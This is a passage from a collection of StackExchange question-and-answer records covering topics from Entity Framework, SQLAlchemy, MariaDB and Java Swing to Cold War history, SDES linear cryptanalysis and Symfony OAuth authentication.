answer.\n","meta":{"source":"mathematica.stackexchange","title":"Interpolation[] gives negative values when all the initial data is positive","dup_signals":{}},"subset":"stackexchange"} +{"text":"Overriding virtual method with generics and constraints\n\nQuestion: I'm trying to override the <code>DbContext.Set<TEntity>()<\/code> method.\nIt's signature is:\n<code>public virtual DbSet<TEntity> Set<TEntity>() where TEntity : class\n<\/code>\nFirst I tried this:\n<code>public override DbSet<TEntity> Set<TEntity>()\n{\n return base.Set<TEntity>();\n}\n<\/code>\n... but I get the error:\n\nThe type 'TEntity' must be a reference type in order to use it as parameter 'TEntity' in the generic type or method 'System.Data.Entity.DbContext.Set()'\n\n... so I then tried specifiying it was a reference type:\n<code>public override DbSet<TEntity> Set<TEntity>() where TEntity: class\n{\n return base.Set<TEntity>();\n}\n<\/code>\n... and I now get:\n\nConstraints for override and explicit interface implementation methods are inherited from the base method, so they cannot be specified directly.\n\n... and if I take it away, I'm back to the first error.\nSo what does the C# compiler want me to do?\nAnswer: Well this is lame... I was using version 6.0.0 of Entity Framework.\nIn 6.0.0 (after digging through the history of the project on Code Plex, I found out that <code>Set<TEntity>()<\/code> wasn't <code>virtual<\/code> back then.\nShame the compiler couldn't say that, rather than sending me round the houses.\nAnyway, updating Entity Framework to 6.1.x (where it is <code>virtual<\/code>), solved the problem;\n<code>Update-Package EntityFramework\n<\/code>\nComment: Nice find. A tip if you encounter a problem like this again: you can always right-click \"Set\" in `base.Set` and choose \"Go to definition\" in Visual Studio, even if you don't have the Entity Framework source code installed locally. There, you would have seen that the method wasn't virtual. And agreed that the compiler should give useful messages.\nAnswer: Can you please post an entire class.\nHere is how I am using and I can compile without any problem.\n<code>public class MyDBContext : DbContext\n{\n public override DbSet<TEntity> Set<TEntity>()\n {\n return base.Set<TEntity>();\n }\n}\n<\/code>\nPlease make sure that you are using latest Entity Framework (6.X)\nComment: Thanks, this got me on the right track; as soon as I removed the rest of the code in the class, the compiler changed it's message to \"`Set()` is not `virtual`; see my answer for what happened next... 
I don't have the rep to +1, but I don't think this is worthy of a -2 :(.\nComment: why my answer goes down? do you want us to help?\nComment: Make sure that you are using the right version. I am using EF 6.X\nComment: I don't have the reputation to up-vote or down-vote :(. It wasn't me! :(.\nComment: They have even introduced IDbContext so that you can automate Unit testing.\nComment: I know it might not be you; there is always some mischief around. You can mark this as answer if it helps.\n","meta":{"source":"stackoverflow","title":"Overriding virtual method with generics and constraints","dup_signals":{}},"subset":"stackexchange"} +{"text":"Was the Iron curtain actually present at the time of the Fulton speech?\n\nQuestion: On March 5th, 1946, Winston Churchill said in his Sinews of Peace speech that\n\nFrom Stettin in the Baltic to Trieste in the Adriatic, an iron curtain has descended across the Continent.\n\nAt the end of the 20th century the term \"Iron curtain\" meant the absence of freedom of movement between Eastern and Western blocs, i. e. it was hard for individuals and organizations to move from Eastern Europe to Western Europe and vice versa.\nDid such lack of freedom of movement exist at the time of the speech (March 1946), i. e. was it hard to impossible for individuals and goods to travel from places occupied by Western troops to those occupied by the Soviet ones and vice versa?\nIf, say, a Pole wanted to emigrate from Poland in March 1946, could he or she easily leave the country?\nAnswer: Independent of political reasons, travel for private persons was greatly restricted until 1949.\nChurchill feared, correctly, that politically a division was being created by the Soviet Union to separate their area of influence from that of the Western Powers.\nOccupied Germany was still (in 1946) under common Allied control, so Germany was excluded by the use of the city name Stettin\n\nwhich was situated right\/east of the red area near the Baltic sea\n\nIn reality the city name of L\u00fcbeck could have been used\n\nwhich was situated left\/west of the red area where the thick black line starts on the Baltic sea\n\nthe purple was part of the agreed Soviet Zone\n\nwhich they occupied in July 1945 after the US troops withdrew\n\nBerlin was not part of the Soviet Zone\n\nbut was subdivided into Sectors under common Allied control\nthe common administration of the city effectively ended during the Berlin Blockade in September 1948\n\nAfter occupying their Zone in Germany, the Soviet Union started immediately to fortify their border to the US and UK Zones with barbed wire.\nInterzonal traffic:\n\nFollowing the military occupation of Germany in May 1945, civilians were initially only allowed to leave their place of residence or its immediate vicinity with a permit from the garrison authority of their zone. By June 1945, the bus and train service within the respective garrison zones had been resumed on many stretches. However, the public train service did not run between the garrison zones. Nevertheless, there were numerous travelers who crossed the extensive uncontrolled boundaries between the garrison zones on foot, by bicycle or by hitch-hiking.\nOn June 30, 1946, the boundary between the Soviet garrison zone and the Western garrison zones (the American, British and French zones) was blocked. The Soviet military administration in Germany (SMAD) had previously asked the Allies to secure the line of demarcation to the Western zones. 
A special identification card, the Inter-zones Travel Passport (Germany), known as the inter-zones passport, was introduced by the Allies. This had to be applied for by citizens wishing to travel in occupied Germany.\n\nNot sure if the same is true for the areas inside Austria. The systematic closing of the borders started on 26 May 1952, which included the borders between the Western Sectors of Berlin and the Soviet Zone.\nIt is assumed this is what led to the 'Iron' in the term used by Churchill.\nFor the Czech border it was not so much the case in 1946, since the Soviets had less control there until the 1948 Czechoslovak coup d'\u00e9tat.\nIn general, travel for everyone (East and West citizens) was greatly restricted. Permits were needed for everything.\nAnother problem was that the documentation of individuals was in a sorry state.\nI have seen Polish passports, issued for persons to work for the Polish government as a representative to the US Military government in Frankfurt. Almost 1\/3 of it was filled with the needed permits to travel and stay there (add to that return trips home for consultations).\n\nFor an individual, even with reliable documents, it would have been very difficult due to the general chaos that existed on both sides.\nAdd to that any political reasons against emigration that the local governments may have had, and 1946-49 were not good years for travelling.\nComment: Before the construction of the Berlin Wall the border between the four zones in Berlin was completely open. They did not even have border checks.\nComment: @FranzDrollig Saw a quote this morning with details of the initial activities, but can't find it at the moment. Will try later.\nComment: @fdb 1) Berlin was subdivided into Sectors. 2) Only former Berlin residents were permitted to return to Berlin, everyone else had to bypass the city since the infrastructure was destroyed. 3) In 1948 the border between the western sectors and the Soviet Zone was also closed off. 4) A permit was needed to enter or leave Berlin (no flights for private persons) 5) Even before the wall was built, sporadic checks were made at the east\/west sector borders. 
Non residents with luggage were often turned back.\nComment: @MarkJohnson Ad *After occupying their Zone in Germany, the Soviet Union started immediately to fortify their border to the US and UK Zones with bob wire.*: Can you please provide a source for this?\n","meta":{"source":"history.stackexchange","title":"Was the Iron curtain actually present at the time of the Fulton speech?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Define sqlalchmey tables based on function input\n\nQuestion: This is a follow up question to this question.\nI'm trying to implement a function that generates a table.\nThe function looks like this:\n<code>import sqlalchemy as sql\nimport sqlalchemy.orm\n\nTableBase = sql.orm.declarative_base()\n\nclass _RealTimeDataBase(TableBase):\n __tablename__ = \"TBL_RealTimeData\"\n\n id = sql.Column(sql.INTEGER, primary_key=True)\n SubTestId = sql.Column(sql.INT)\n CellOrCup = sql.Column(sql.INT)\n TimeInfo = sql.Column(sql.INT)\n TestTemp = sql.Column(sql.FLOAT)\n OxygenHumid = sql.Column(sql.FLOAT)\n NitrogenHumi = sql.Column(sql.FLOAT)\n OTR = sql.Column(sql.FLOAT)\n TimeDe = sql.Column(sql.INT)\n LocalTime = sql.Column(sql.DATETIME)\n\ndef RealTimeData(testType: int):\n if testType == 1:\n class RealTimeDataFilm(_RealTimeDataBase): # Error occurs here (line 148) \n CoffOxy = sql.Column(sql.FLOAT)\n\n return RealTimeDataFilm\n else:\n class RealTimeDataPackage(_RealTimeDataBase):\n CoffOxy = None\n\n return RealTimeDataPackage\n<\/code>\nBasically the <code>CoffOxy<\/code> column only exits if the <code>TestType<\/code> is 1 otherwise it should be <code>None<\/code>.\nUnfortunately when I call the function the second time I run into this error:\n<code> File \"\/home\/gianl\/code\/Source Graphics\/labthink-permeability-reports\/permeability\/sqliteModels.py\", line 148, in RealTimeData\n class RealTimeDataFilm(_RealTimeDataBase):\n File \"\/opt\/anaconda\/envs\/labthink-permeability-reports\/lib\/python3.9\/site-packages\/sqlalchemy\/orm\/decl_api.py\", line 72, in __init__\n _as_declarative(reg, cls, dict_)\n File \"\/opt\/anaconda\/envs\/labthink-permeability-reports\/lib\/python3.9\/site-packages\/sqlalchemy\/orm\/decl_base.py\", line 126, in _as_declarative\n return _MapperConfig.setup_mapping(registry, cls, dict_, None, {})\n File \"\/opt\/anaconda\/envs\/labthink-permeability-reports\/lib\/python3.9\/site-packages\/sqlalchemy\/orm\/decl_base.py\", line 177, in setup_mapping\n return cfg_cls(registry, cls_, dict_, table, mapper_kw)\n File \"\/opt\/anaconda\/envs\/labthink-permeability-reports\/lib\/python3.9\/site-packages\/sqlalchemy\/orm\/decl_base.py\", line 312, in __init__\n self._setup_inheritance(mapper_kw)\n File \"\/opt\/anaconda\/envs\/labthink-permeability-reports\/lib\/python3.9\/site-packages\/sqlalchemy\/orm\/decl_base.py\", line 889, in _setup_inheritance\n raise exc.ArgumentError(\nsqlalchemy.exc.ArgumentError: Column 'CoffOxy' on class <class 'permeability.sqliteModels.RealTimeData.<locals>.RealTimeDataFilm'> conflicts with existing column 'TBL_RealTimeData.CoffOxy'\n<\/code>\nAlthough <code>CoffOxy<\/code> is not defined yet it still complains that I redefine it. How could I solve this error? 
Or is there another way to get the same logic working?\nLive example on colab (comment if the link is not working)\nAnswer: Figured it out I just need to define the classes outside of the function scope.\n<code>import sqlalchemy as sql\nimport sqlalchemy.orm\n\nTableBase = sql.orm.declarative_base()\n\nclass _RealTimeDataBase(TableBase):\n __tablename__ = \"TBL_RealTimeData\"\n\n id = sql.Column(sql.INTEGER, primary_key=True)\n SubTestId = sql.Column(sql.INT)\n CellOrCup = sql.Column(sql.INT)\n TimeInfo = sql.Column(sql.INT)\n TestTemp = sql.Column(sql.FLOAT)\n OxygenHumid = sql.Column(sql.FLOAT)\n NitrogenHumi = sql.Column(sql.FLOAT)\n OTR = sql.Column(sql.FLOAT)\n TimeDe = sql.Column(sql.INT)\n LocalTime = sql.Column(sql.DATETIME)\n\nclass _RealTimeDataPackage(_RealTimeDataBase):\n CoffOxy = None\n\nclass _RealTimeDataFilm(_RealTimeDataBase):\n CoffOxy = sql.Column(sql.FLOAT)\n\ndef RealTimeData(testType: int):\n if testType == 1:\n return _RealTimeDataFilm\n else:\n return _RealTimeDataPackage\n<\/code>\n","meta":{"source":"stackoverflow","title":"Define sqlalchmey tables based on function input","dup_signals":{}},"subset":"stackexchange"} +{"text":"Error 1064 in MySQL trying Forward Engineering\n\nQuestion: I'm new to MySQL and when I tried to do the \"Forward Engineer\" I've encountered this error: \n<code>ERROR: Error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\n CONSTRAINT `fk_Vendite_Prodotti`\n FOREIGN KEY (`Prodotti_idProdotti`)\n ' at line 11\nSQL Code:\n -- -----------------------------------------------------\n -- Table `mydb`.`Vendite`\n -- -----------------------------------------------------\n CREATE TABLE IF NOT EXISTS `mydb`.`Vendite` (\n `idVendite` INT NOT NULL,\n `dataVendita` DATETIME NULL,\n `qta` INT NULL,\n `costo` FLOAT NULL,\n `Prodotti_idProdotti` INT NOT NULL,\n PRIMARY KEY (`idVendite`),\n INDEX `fk_Vendite_Prodotti_idx` (`Prodotti_idProdotti` ASC) VISIBLE,\n CONSTRAINT `fk_Vendite_Prodotti`\n FOREIGN KEY (`Prodotti_idProdotti`)\n REFERENCES `mydb`.`Prodotti` (`idProdotti`)\n ON DELETE NO ACTION\n ON UPDATE NO ACTION)\n ENGINE = InnoDB\n\nSQL script execution finished: statements: 6 succeeded, 1 failed\n\nFetching back view definitions in final form.\nNothing to fetch\n<\/code>\nI know there are a lot of questions about this topic but I've seen that it's a very specific. 
Also being new to SQL I have no idea what the problem could be\nAnswer: As far as concerns, MariaDB does not support invisible indexes (only MySQL 8.0 supports that), so the error comes from the use of the <code>VISIBLE<\/code> keyword.\nSince indexes are visible by default anyway, I would suggest just removing it:\n<code>CREATE TABLE IF NOT EXISTS `mydb`.`Vendite` (\n `idVendite` INT NOT NULL,\n `dataVendita` DATETIME NULL,\n `qta` INT NULL,\n `costo` FLOAT NULL,\n `Prodotti_idProdotti` INT NOT NULL,\n PRIMARY KEY (`idVendite`),\n INDEX `fk_Vendite_Prodotti_idx` (`Prodotti_idProdotti`),\n CONSTRAINT `fk_Vendite_Prodotti`\n FOREIGN KEY (`Prodotti_idProdotti`)\n REFERENCES `mydb`.`Prodotti` (`idProdotti`)\n ON DELETE NO ACTION\n ON UPDATE NO ACTION\n) ENGINE = InnoDB\n<\/code>\n","meta":{"source":"stackoverflow","title":"Error 1064 in MySQL trying Forward Engineering","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to use row_number and partition function in sqldf\n\nQuestion: Update\nI can run below sql query in netezza database, but it goes wrong in sqldf package in R\n<code>> sqldf(\"SELECT TEXT, \n+ VEH_MAKE_NM, \n+ NEW_USED_CD, \n+ PRODUCT, \n+ OVERALL_SUBV_IND, \n+ AS_OF_DATE, \n+ CATEGORY,\n+ ROW_NUMBER() OVER(PARTITION BY TEXT, VEH_MAKE_NM, NEW_USED_CD, PRODUCT, OVERALL_SUBV_IND, AS_OF_DATE ORDER BY CATEGORY DESC) RN_CATEGORY,\n+ SUBCATEGORY,\n+ ROW_NUMBER() OVER(PARTITION BY TEXT, VEH_MAKE_NM, NEW_USED_CD, PRODUCT, OVERALL_SUBV_IND, AS_OF_DATE ORDER BY SUBCATEGORY DESC) RN_SUBCATEGORY\n+ FROM output\n+ --GROUP BY 1,2,3,4,5,6\")\nError in sqliteSendQuery(con, statement, bind.data) : \n error in statement: near \"(\": syntax error\n<\/code>\nI think it might because sqldf package doesn't support netezza SQL. Is there a netezza sql package in R?\nThanks\nComment: The only sqldf backend that supports partition is PostgreSQL.\nComment: Hi @vkp, tried both `==` and `=`, neither of them works...\nComment: Same... I tried `' '`, `\" \"` and ` `, all did not work\nComment: is `CATEGORY` a column name in one of the tables? and if you use `\"\"` around it, it will be case-sensitive\nComment: I changed `\"CATEGORY\"` into `CATEGORY` and it turns out that the problem is in these two rows: \n`ROW_NUMBER() OVER(PARTITION BY TEXT, VEH_MAKE_NM, NEW_USED_CD, PRODUCT, OVERALL_SUBV_IND, AS_OF_DATE ORDER BY CATEGORY DESC) RN_CATEGORY,\n SUBCATEGORY,\n ROW_NUMBER() OVER(PARTITION BY TEXT, VEH_MAKE_NM, NEW_USED_CD, PRODUCT, OVERALL_SUBV_IND, AS_OF_DATE ORDER BY SUBCATEGORY DESC) RN_SUBCATEGORY`\nComment: When I use RPostgreSQL package, do I need to set a database as well? Or I can just use its function. Cause when I run the code... it seems like asking for a database\nComment: See sqldf FAQ#12 on the sqldf home page: https:\/\/github.com\/ggrothendieck\/sqldf\nComment: Since this posts sqlite added support for partition.\nAnswer: Step 1. 
Add row number column into output dataframe:\n<code>output['RN_CATEGORY'] = output.sort_values(['CATEGORY'], \n ascending=False).groupby(['TEXT', 'VEH_MAKE_NM', 'NEW_USED_CD', 'PRODUCT', \n 'OVERALL_SUBV_IND', 'AS_OF_DATE']).cumcount() + 1\n\noutput['RN_SUBCATEGORY'] =output.sort_values(['SUBCATEGORY'], \n ascending=False).groupby(['TEXT', 'VEH_MAKE_NM', 'NEW_USED_CD', 'PRODUCT', \n 'OVERALL_SUBV_IND', 'AS_OF_DATE']).cumcount() + 1\n<\/code>\nStep 2.\n<code>sqldf(\"SELECT TEXT, \n VEH_MAKE_NM, \n NEW_USED_CD, \n PRODUCT, \n OVERALL_SUBV_IND, \n AS_OF_DATE, \n CATEGORY,\n RN_CATEGORY,\n SUBCATEGORY,\n RN_SUBCATEGORY\n FROM output\n--GROUP BY 1,2,3,4,5,6\")\n<\/code>\nComment: As it's currently written, your answer is unclear. Please [edit] to add additional details that will help others understand how this addresses the question asked. You can find more information on how to write good answers [in the help center](\/help\/how-to-answer).\n","meta":{"source":"stackoverflow","title":"How to use row_number and partition function in sqldf","dup_signals":{}},"subset":"stackexchange"} +{"text":"Gmail in firefox showing time in UTC, but not in chromium\n\nQuestion: The time of emails in Gmail shows up in UTC in Firefox, but they are in Local time in Chromium. Calendar shows the local time.\nHow to fix this?\nComment: IMO you made the wrong fix when you changed Ubuntu to derive time from local. Windows is the outlier for using local time instead of UTC. This is a vestige from pre-internet that they are overdue on fixing. I'd suggest changing Ubuntu and Windows to derive time from UTC.\nComment: I entered the command `timedatectl set-local-rtc 0` but the issue is still there. Also previously the system clock was in RTC. Why would gmail use UTC anyway?\nComment: The issue is present only in firefox irrespective of whether system clock is set to UTC or RTC. I have updated the question.\nAnswer: I found it. The entry <code>privacy.resistFingerprinting => true<\/code> in <code>about:config<\/code> forces every website to use UTC.\nThere is no other way to use local time zone in Gmail without being tracked by fingerprinting services, which is an annoying bug arising from extra security, because the user may want to resist fingerprinting, but still use local time.\nThis answer is based on https:\/\/support.mozilla.org\/en-US\/questions\/1212634\n","meta":{"source":"askubuntu","title":"Gmail in firefox showing time in UTC, but not in chromium","dup_signals":{}},"subset":"stackexchange"} +{"text":"Java NoClassDefFoundError even when Jars in same folder\n\nQuestion: I have created a simple Java program (1 java file that contains the main() ), and I've included all Jar files in the same directory as the .class file. It is giving the NoClassDefFoundError message.\nI've tried updating the Classpath to point to the directory, and I've also set \"-cp .\" to suggest that it look in the same directory as the .class file. However, the program still says it can't find the class def.\nAny thoughts on what I should do?\nComment: Which class, which jars, which code? Wat?\nComment: sorry for any confusion. My program is one java class that contains the main(). My program needs to reference several packages (*.jar). I hope this helps.\nComment: Problem solved: I had updated the classpath in the Windows OS, but I needed to run the Java program in a new Command window... so the new classpath would be active. 
Thank you for your help!\nAnswer: Adding a folder tells java to look in that folder for .class files.\nYou can't reference .jar files via a folder name... Each .jar file's path must be listed on the CLASSPATH explicitly.\nThis question's answer may be useful\nAnswer: When you try running a class from the command line, a NoClassDefFoundError usually means there is something wrong with your classpath.\nYou have to explicitly define the classpath. You can do this in a few ways, but the following way is the least prone to error:\nOpen a command shell and do the following:\n1.) set classpath={path to class files};{path to jars}\n2.) java com.example.mainclass\nNote: Even if your class path and jar path are the same, you need to specify them explicitly.\nNote: If you have more than one jar, place them in a folder, say lib, and add it to the classpath like: {path}\/lib\/* This will include all of the jars; otherwise you have to specify them individually. \nReferences: https:\/\/javarevisited.blogspot.com\/2011\/01\/how-classpath-work-in-java.html\nAnswer: Import the following package:\n<code>import java.lang.NoClassDefFoundError;\n<\/code>\n","meta":{"source":"stackoverflow","title":"Java NoClassDefFoundError even when Jars in same folder","dup_signals":{}},"subset":"stackexchange"} +{"text":"Extracting key bits from linear cryptanalysis equation for SDES\n\nQuestion: From the linear cryptanalysis of SDES, we get a linear equation involving K[1, 3] of round keys 1 and 2. From this how will I retrieve the key bit?\nHow do we solve the linear equation we get from the linear cryptanalysis to predict the key bits? \n\nBits 1 and 3 of round keys 1 and 2 are present in the final relation. From this we apply Algorithm 1, as stated in the paper by Matsui on linear cryptanalysis (the second image)\n\nBut from this how do we predict the bits of the actual\/original key?\nComment: You need to provide more details to make a self-contained question and provide the equation you are referring to. Don't expect others to do your work for you.\nComment: Tried to clear the question.\nAnswer: The attack, as stated in sections 6.2 & 6.3, actually can only recover the quantity\n$K_1[1,3]\\oplus K_2[1,3]$.\nWhat you would hope to do is to use a similar approach via another high-probability linear relation [usually there is more than one] and recover more relations between subkey bits. Eventually, the goal is recovering all the original key bits. Assuming enough relations between pairs of key bits are recovered, you can take one variable in each relation as an unknown, brute-force over those values using more plaintext\/ciphertext pairs, and select the values that give the highest bias. This is quite tiresome for DES.\nI suggest reading Howard Heys' tutorial on linear and differential cryptanalysis [google it], which now appears as part of Stinson's Crypto book (3rd ed.) as well, where clearer examples of targeting subkey bits are given, for both linear and differential cryptanalysis.\n","meta":{"source":"crypto.stackexchange","title":"Extracting key bits from linear cryptanalysis equation for SDES","dup_signals":{}},"subset":"stackexchange"} +{"text":"JProgressBar too fast\n\nQuestion: I am trying to add a progress bar. Everything works and I don't get any error. 
But the progress bar goes from 0% to 100% without even going through the values between it (I mean it's too fast, and the users are unable to see the progress bar blocks filling in)\n<code>pr = new JProgressBar();\n\n pr(0);\n pr(true);\n..\n\npublic void iterate(){\n\n while (i<=20000){\n pr.setValue(i);\n i=i+1000;\n try{\n Thread.sleep(150);\n }catch (Exception e){\n e.printStackTrace();\n }\n }\n }\n<\/code>\nWhen i button is clicked i call the <code>iterate()<\/code> method, and i expect it to update the progress bar progressively. instead it pauses for a while and then displays a full progress bar.\nHow can i solve this ?\n2.) I don't like the default blue color of the progress bar tabs. I need to change the color. I tried <code>pr.setForeground(Color.GRAY);\n pr.setBackground(Color.RED);<\/code> But it didn't work.\nComment: Use a [Swing Worker](http:\/\/docs.oracle.com\/javase\/tutorial\/uiswing\/concurrency\/worker.html) because right now you are blocking GUI [`Event Dispatch Thread`](http:\/\/docs.oracle.com\/javase\/tutorial\/uiswing\/concurrency\/dispatch.html) with sleep, thus you dont see the pause between increments. Please post [SSCCE](http:\/\/sscce.org) for better help sooner\nAnswer: The problem is, you're trying to update the progress within the context of the Event Dispatching Thread.\nThis basically means that while you are in you loop, the EDT is unable to process any paint request you are making.\nWhat you need to do is some how offload the work to a separate thread and update the progress bar as needed. The problem with this, is you should never update the UI from any thread other then the EDT.\nBut don't despair, you have a number of options, the best is using a Swing Worker\nUpdated with example\n\n<code>public class SwingWorkerProgress {\n\n public static void main(String[] args) {\n new SwingWorkerProgress();\n }\n\n public SwingWorkerProgress() {\n EventQueue.invokeLater(new Runnable() {\n @Override\n public void run() {\n try {\n UIManager.setLookAndFeel(UIManager.getSystemLookAndFeelClassName());\n } catch (ClassNotFoundException | InstantiationException | IllegalAccessException | UnsupportedLookAndFeelException ex) {\n }\n\n JFrame frame = new JFrame(\"Testing\");\n frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);\n frame.setLayout(new BorderLayout());\n frame.add(new TestPane());\n frame.pack();\n frame.setLocationRelativeTo(null);\n frame.setVisible(true);\n }\n });\n }\n\n public class TestPane extends JPanel {\n\n private JProgressBar pbProgress;\n private JButton start;\n\n public TestPane() {\n\n setBorder(new EmptyBorder(10, 10, 10, 10));\n pbProgress = new JProgressBar();\n setLayout(new GridBagLayout());\n GridBagConstraints gbc = new GridBagConstraints();\n gbc.insets = new Insets(4, 4, 4, 4);\n gbc.gridx = 0;\n gbc.gridy = 0;\n add(pbProgress, gbc);\n\n start = new JButton(\"Start\");\n gbc.gridy++;\n add(start, gbc);\n\n start.addActionListener(new ActionListener() {\n @Override\n public void actionPerformed(ActionEvent e) {\n start.setEnabled(false);\n ProgressWorker pw = new ProgressWorker();\n pw.addPropertyChangeListener(new PropertyChangeListener() {\n\n @Override\n public void propertyChange(PropertyChangeEvent evt) {\n String name = evt.getPropertyName();\n if (name.equals(\"progress\")) {\n int progress = (int) evt.getNewValue();\n pbProgress.setValue(progress);\n repaint();\n } else if (name.equals(\"state\")) {\n SwingWorker.StateValue state = (SwingWorker.StateValue) evt.getNewValue();\n switch (state) {\n case DONE:\n 
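                                            // SwingWorker delivers these property-change events on the EDT, so once the worker reports DONE it is safe to update Swing components here.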
start.setEnabled(true);\n break;\n }\n }\n }\n\n });\n pw.execute();\n }\n });\n\n }\n }\n\n public class ProgressWorker extends SwingWorker<Object, Object> {\n\n @Override\n protected Object doInBackground() throws Exception {\n int i = 0;\n int max = 2000;\n\n while (i < max) {\n i += 10;\n int progress = Math.round(((float)i \/ (float)max) * 100f);\n setProgress(progress);\n try {\n Thread.sleep(25);\n } catch (Exception e) {\n e.printStackTrace();\n }\n }\n\n return null;\n }\n }\n}\n<\/code>\nComment: I am trying to extract some of the code from your example to my application. I am not sure as in what parts to copy\nComment: Start with everything, run it a few times, add some break points in or `System.out.println` statements so you can understand the flow. The two most important aspects are `ProgressWorker` and the code inside the `start` button's `ActionListener`\nComment: Oh, since when did you decide to use __try multi catch__? ;)\nComment: @MouseEvent Moved over to Java 7 several weeks ago, only chance to play with it ;)\nAnswer: Why do you iterate in <code>i=i+1000;<\/code>? Please try something like this:\n<code>public void iterate(){\n\n int i = 0;\n\n while (i<=100){\n pr.setValue(i);\n i=i+10;\n try{\n Thread.sleep(150);\n }catch (Exception e){\n e.printStackTrace();\n }\n }\n}\n<\/code>\nAlso you should use a <code>SwingWorker<\/code> or at least an extra <code>Thread<\/code>, but that was mentioned before.\nComment: @user1315906 http:\/\/docs.oracle.com\/javase\/tutorial\/uiswing\/concurrency\/worker.html and http:\/\/docs.oracle.com\/javase\/tutorial\/uiswing\/concurrency\/interim.html\nComment: +1 `Thread.sleep` is a way to _simulate_ latency, for [example](http:\/\/stackoverflow.com\/a\/4637725\/230513), just don;t sleep on the EDT.\n","meta":{"source":"stackoverflow","title":"JProgressBar too fast","dup_signals":{}},"subset":"stackexchange"} +{"text":"Combining fos_oauth authenticator with single key authenticator\n\nQuestion: I set up two authentication methods for my api:\n\nPrivate token authenticator by following this tutorial\nFOSOAuthServerBundle system for access_token auth: https:\/\/github.com\/FriendsOfSymfony\/FOSOAuthServerBundle \n\nBoth works like a charm separately.\nI tried to combine those systems with this security config:\n<code>security:\n encoders:\n FOS\\UserBundle\\Model\\UserInterface: sha512\n\n role_hierarchy:\n ROLE_ALLOWED_TO_SWITCH: ~\n ROLE_SUPPORT: ~\n ROLE_ADMIN: [ROLE_SONATA_ADMIN]\n ROLE_SUPER_ADMIN: [ROLE_ADMIN, ROLE_SUPPORT, ROLE_ALLOWED_TO_SWITCH]\n\n providers:\n fos_userbundle:\n id: fos_user.user_provider.username_email\n api_key_user:\n id: security.user.provider.api_key\n\n firewalls:\n dev:\n pattern: ^\/(_(profiler|wdt)|css|images|js)\/\n security: false\n\n oauth_token:\n pattern: ^\/oauth\/v2\/token\n security: false\n\n api:\n pattern: ^\/api\n stateless: true\n simple_preauth:\n authenticator: security.authentication.authenticator.api_key\n fos_oauth: true\n\n main:\n pattern: ^\/\n form_login:\n provider: fos_userbundle\n csrf_provider: form.csrf_provider\n login_path: \/login\n check_path: \/login_check\n\n anonymous: ~\n logout:\n path: \/logout\n switch_user: true\n<\/code>\nIf I try to get an access token with this curl command:\n<code>curl \"http:\/\/localhost:8000\/oauth\/v2\/token?client_id=1_2rqa1al0trwgso8g8co4swsks48cwsckgc8cokswkcgos4csog&client_secret=25a78plm6c2ss044k4skckkwoo8kw4kcoccg8sg0skook4sgwg&grant_type=password&username=test&password=test\n<\/code>\nIt works an I get an access_token, but when I try 
to use it:\n<code>curl -X GET http:\/\/localhost:8000\/api\/changelogs.json -H \"Authorization: Bearer MmI2OWNkNjhjMGYwOTUyNDA2OTdlMDBjNjA1YmI3MjVhNTBiMTNhMjI0MGE1YmM3NzgwNjVmZWZmYWNhM2E4YQ\" | json_pp\n<\/code>\nI get:\n<code>{\n \"error\" : \"invalid_grant\",\n \"error_description\" : \"The provided access token is invalid.\"\n}\n<\/code>\nBy deactivating my single_preauth api key authenticator, it's works and I can access to my API.\nIt seems my api key authenticator block all another system.\nHere, my ApiKeyAuthenticator class:\n<code>class ApiKeyAuthenticator implements SimplePreAuthenticatorInterface, AuthenticationFailureHandlerInterface\n{\n private $userProvider;\n\n \/**\n * @param ApiKeyUserProvider $userProvider\n *\/\n public function __construct(ApiKeyUserProvider $userProvider)\n {\n $this->userProvider = $userProvider;\n }\n\n \/**\n * {@inheritdoc}\n *\/\n public function createToken(Request $request, $providerKey)\n {\n $apiKey = str_replace('Bearer ', '', $request->headers->get('Authorization', ''));\n\n if (!$apiKey) {\n throw new BadCredentialsException('No API key given.');\n }\n\n return new PreAuthenticatedToken('anon.', $apiKey, $providerKey);\n }\n\n \/**\n * {@inheritdoc}\n *\/\n public function authenticateToken(TokenInterface $token, UserProviderInterface $userProvider, $providerKey)\n {\n $apiKey = $token->getCredentials();\n $username = $this->userProvider->getUsernameForApiKey($apiKey);\n\n if (!$username) {\n throw new AuthenticationException('The provided access token is invalid.');\n }\n\n $user = $this->userProvider->loadUserByUsername($username);\n\n return new PreAuthenticatedToken(\n $user,\n $apiKey,\n $providerKey,\n $user->getRoles()\n );\n }\n\n \/**\n * {@inheritdoc}\n *\/\n public function supportsToken(TokenInterface $token, $providerKey)\n {\n return $token instanceof PreAuthenticatedToken && $token->getProviderKey() === $providerKey;\n }\n\n \/**\n * {@inheritdoc}\n *\/\n public function onAuthenticationFailure(Request $request, AuthenticationException $exception)\n {\n return new JsonResponse([\n 'error' => 'invalid_grant',\n 'error_description' => $exception->getMessage()\n ], 401);\n }\n}\n<\/code>\nBut I can't find why.\nHow to combine this two authenticator methods?\nThanks for help.\nAnswer: Finaly found how to handle it but not sure it's the better and proper way.\nDon't hesitate to suggest improvements on comments! ;)\nFirst of all, remove <code>fos_oauth<\/code> key from <code>security.yml<\/code> file. 
It should looks like:\n<code>security:\n firewalls:\n # [...]\n api:\n pattern: ^\/api\n stateless: true\n # This will handle both oauth access token and simple private token\n simple_preauth:\n authenticator: security.authentication.authenticator.api_key\n # [...]\n<\/code>\nOn <code>ApiKeyUserProvider::getUsernameForApiKey<\/code> method, you will search on both custom api key manager and OAuth access token manager.\nThe complete class should look like this.\n<code>class ApiKeyUserProvider implements UserProviderInterface\n{\n \/**\n * @var UserManagerInterface\n *\/\n private $userManager;\n\n \/**\n * @var ApiKeyManager\n *\/\n private $apiKeyManager;\n\n \/**\n * @var AccessTokenManagerInterface\n *\/\n private $accessTokenManager;\n\n \/**\n * @param UserManagerInterface $userManager\n * @param ApiKeyManager $apiKeyManager\n * @param AccessTokenManagerInterface $accessTokenManager\n *\/\n public function __construct(UserManagerInterface $userManager, ApiKeyManager $apiKeyManager, AccessTokenManagerInterface $accessTokenManager)\n {\n $this->userManager = $userManager;\n $this->apiKeyManager = $apiKeyManager;\n $this->accessTokenManager = $accessTokenManager;\n }\n\n \/**\n * @param string $apiKey\n *\n * @return string|null\n *\/\n public function getUsernameForApiKey($apiKey)\n {\n \/\/ FOSOAuth system\n $token = $this->accessTokenManager->findTokenByToken($apiKey);\n if ($token) {\n return $token->getUser()->getUsername();\n }\n\n \/\/ Private key system\n return 